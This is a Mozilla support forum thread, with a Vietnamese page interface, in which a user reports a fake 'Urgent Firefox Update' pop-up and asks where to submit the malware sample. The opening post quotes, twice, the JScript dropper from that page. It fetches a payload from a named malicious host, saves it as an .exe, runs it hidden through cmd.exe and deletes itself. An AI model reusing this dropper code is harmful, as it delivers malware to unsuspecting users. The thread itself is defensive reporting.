Avatar for Username

Tìm kiếm hỗ trợ

Tránh các lừa đảo về hỗ trợ. Chúng tôi sẽ không bao giờ yêu cầu bạn gọi hoặc nhắn tin đến số điện thoại hoặc chia sẻ thông tin cá nhân. Vui lòng báo cáo hoạt động đáng ngờ bằng cách sử dụng tùy chọn "Báo cáo lạm dụng".

Learn More

Chủ đề này đã được lưu trữ. Vui lòng hỏi một câu hỏi mới nếu bạn cần giúp đỡ.

Where to send malware code

  • 3 trả lời
  • 1 gặp vấn đề này
  • 10 lượt xem
  • Trả lời mới nhất được viết bởi James

neodev
neodev
more options

I have a .js file and .dat file that I snagged when a Urgent Firefox Update message popped up. This urgent update looked very Firefox Official. I noticed the redirect URL and it was: https://queidwhoreslag.net/9751229892037/e9e0075191d8aac19e485315d1b67c26.html. So I saved the .js file on one of my other computers and snagged some other stuff from their API. I have the malware code that is Firefox directed. Just need to know where to send the compressed files. Below is a glimpse at some of the .js code:

url='https://queidwhoreslag.net/10/524.dat'; 

fname=b.GetSpecialFolder(2)+'\\1e90999f64aa011197bfdf7c1792c61b.exe';
for(var i=1;i<=5;i++)
{

try { c.open('GET', url, false); c.send(null); break; } 

    catch(e){

WScript.Sleep(5000); } 

}
d.Open;
d.Type = 1;
d.Write(c.ResponseBody);
d.Position=0;
if (b.Fileexists(fname))b.DeleteFile(fname);
d.SaveToFile(fname);
a.run('cmd.exe /c "'+fname+'"',0,false);
var p = WScript.ScriptFullName;
if (b.FileExists(p))b.DeleteFile(p);
WScript.Echo('Update complete.'); 
} catch (e) {}
I have a .js file and .dat file that I snagged when a Urgent Firefox Update message popped up. This urgent update looked very Firefox Official. I noticed the redirect URL and it was: https://queidwhoreslag.net/9751229892037/e9e0075191d8aac19e485315d1b67c26.html. So I saved the .js file on one of my other computers and snagged some other stuff from their API. I have the malware code that is Firefox directed. Just need to know where to send the compressed files. Below is a glimpse at some of the .js code: ----------------------------------------------------------------------------------------------------------------- url='https://queidwhoreslag.net/10/524.dat'; fname=b.GetSpecialFolder(2)+'\\1e90999f64aa011197bfdf7c1792c61b.exe'; for(var i=1;i<=5;i++) { try { c.open('GET', url, false); c.send(null); break; } catch(e){ WScript.Sleep(5000); } } d.Open; d.Type = 1; d.Write(c.ResponseBody); d.Position=0; if (b.Fileexists(fname))b.DeleteFile(fname); d.SaveToFile(fname); a.run('cmd.exe /c "'+fname+'"',0,false); var p = WScript.ScriptFullName; if (b.FileExists(p))b.DeleteFile(p); WScript.Echo('Update complete.'); } catch (e) {} -----------------------------------------------------------------------------------------------------------------

Giải pháp được chọn

You can bring up the code in https://support.mozilla.org/en-US/forums/contributors/712075

Đọc câu trả lời này trong ngữ cảnh 👍 0

Tất cả các câu trả lời (3)

FredMcD
FredMcD
more options

. Whenever you get a message / popup that software / files need to be updated;

DO NOT USE ANY OF THE PROVIDED LINKS

While this may be a legitimate message, it could also be Malware or a Virus. Any time you want or need to check for upgrades, go to the website of the True Owner of the program in question. For example, to check out Firefox, go to https://www.mozilla.org {web link}

You can report such a site at; Google Report Phishing Page {web link} which is the same when done while on site by going to Help > Report Web Forgery

Help us safeguard Mozilla’s trademarks by reporting misuse {web link}

neodev
neodev Người tạo câu hỏi
more options

I did not click on the provided URLs; I opened up my Kali Linux VM and grabbed the direct URL to file links and downloaded the package that the malware was intending to deliver behind the scenes. I am just wondering if Mozilla is interested in the code; if not then this is solved.

James
James
  • Top 25 Contributor
  • Moderator
more options

Giải pháp được chọn

You can bring up the code in https://support.mozilla.org/en-US/forums/contributors/712075